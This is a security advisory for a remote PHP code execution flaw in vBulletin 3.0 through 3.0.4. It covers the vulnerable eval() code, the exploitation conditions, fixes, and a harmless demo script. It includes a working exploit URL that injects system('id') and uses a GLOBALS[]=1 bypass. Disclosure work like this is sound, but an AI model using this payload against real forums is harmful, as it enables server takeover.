vBulletin 3.0.x PHP Code Execution Vulnerability
Author: unknown    Source: www.securityfocus.com    Updated: 2005-02-16
Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4

Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6

Vulnerable code in forumdisplay.php:
#############################################################
if ($vboptions['showforumusers'])
{
    // ...
    if ($bbuserinfo['userid'])
    {
        // ...
        $comma = ', ';
    }
    // ...
    while ($loggedin = $DB_site->fetch_array($forumusers))
    {
        // ...
        eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); // <<==== (Vuln)
        $comma = ', ';
        // ...
    }
    // ...
}
#############################################################

The eval() builds a double-quoted PHP string out of $comma and the template
and then executes it. For a guest, $comma is never initialised in this code
path, so with register_globals on it is whatever the request supplied. A value
that closes the quote, such as ".system('id')." , turns the rest of the request
parameter into PHP code that runs on the server.

Conditions:
----------------
1st condition: $vboptions['showforumusers'] == true; the admin must have
    turned showforumusers ON in the vBulletin options.
2nd condition: $bbuserinfo['userid'] == 0; you must be a visitor/guest.
    Logged-in users go through the branch that sets $comma = ', ' before
    the loop, which overwrites the injected value.
3rd condition: $DB_site->fetch_array($forumusers) must return a row; at
    least one user must be shown as viewing the forum, otherwise the
    eval() is never reached.
4th condition: magic_quotes_gpc must be OFF, otherwise the double quotes
    in the payload arrive backslash-escaped and cannot break out of the
    string literal.
SPECIAL condition: you must get past the unset($GLOBALS["$_arrykey"]) loop
    in init.php, which removes every request key from the global scope to
    undo register_globals. The trick is the array parameter GLOBALS[]=1:
    with register_globals on it replaces the $GLOBALS array itself with an
    ordinary array, so the unset() calls operate on that copy and the real
    global $comma survives ;)))

Solutions:
----------------
* Disable showforumusers in the vBulletin options.
* Add the following line before if ($vboptions['showforumusers']):
    $comma = '';
* Upgrade to 3.0.5 or later, which is not affected.

Exploit:
----------------
Example (f=2 is the id of a forum that guests may view):
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
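The following stand-alone script is an added example, not vBulletin's own code. It reproduces the loop above in miniature so the injection can be watched outside a forum install: fetch_template_stub(), render_vulnerable() and render_fixed() are names chosen for this demo, the template text and user rows are constructed test data, and the attacker-controlled $comma is passed in as a function argument to stand in for what register_globals would have done. The payload has the same shape as the advisory's comma=".system('id')." but only sets a marker variable instead of running a command.

```php
<?php
// Added example, not vBulletin code: a minimal reproduction of the
// forumdisplay.php eval() pattern, with the advisory's fix alongside it.
// Names and data below are chosen for this demo only.

// Stand-in for fetch_template('forumdisplay_loggedinuser'). vBulletin keeps
// templates as the body of a double-quoted PHP string, so literal quotes in
// the HTML are backslash-escaped and $loggedin[...] is interpolated by eval().
function fetch_template_stub(): string
{
    return '<a href=\"member.php?u=$loggedin[userid]\">$loggedin[username]</a>';
}

// Vulnerable shape: $comma comes from outside the function, which is what
// register_globals does for a guest request carrying comma=... . A value
// with an unescaped " closes the string literal inside the eval()ed source
// and whatever follows is executed as PHP.
function render_vulnerable(array $forumusers, $comma): string
{
    $activeusers = '';
    foreach ($forumusers as $loggedin) {
        eval('$activeusers .= "' . $comma . fetch_template_stub() . '";');
        $comma = ', ';
    }
    return $activeusers;
}

// The advisory's one-line fix: initialise $comma before the loop so that
// only the two values this function writes ('' and ', ') ever reach eval().
function render_fixed(array $forumusers): string
{
    $comma = '';
    $activeusers = '';
    foreach ($forumusers as $loggedin) {
        eval('$activeusers .= "' . $comma . fetch_template_stub() . '";');
        $comma = ', ';
    }
    return $activeusers;
}

// Constructed rows standing in for $DB_site->fetch_array($forumusers).
$forumusers = [
    ['userid' => 1, 'username' => 'alice'],
    ['userid' => 2, 'username' => 'bob'],
];

// Side-effect-free payload in the shape of ".system('id')." : inside eval()
// the first statement becomes
//   $activeusers .= "".($GLOBALS['marker'] = 'code ran')."<a ...>";
$payload = '".($GLOBALS[\'marker\'] = \'code ran\')."';

$marker = 'untouched';
$html = render_vulnerable($forumusers, $payload);
echo "vulnerable: marker = $marker\n";
echo "            output = $html\n";

$marker = 'untouched';
$html = render_fixed($forumusers);
echo "fixed:      marker = $marker\n";
echo "            output = $html\n";
```

Run it with any PHP 7 or 8 CLI: the first block reports the marker changed to "code ran" and the injected text prefixed to the HTML, the second reports it untouched and prints only the two user links separated by ", ". The initialisation closes this particular hole, but the underlying hazard is splicing any runtime value into a string handed to eval(); the durable fix is to render templates without eval(), or at minimum to escape every interpolated value with addslashes() before building the eval() source.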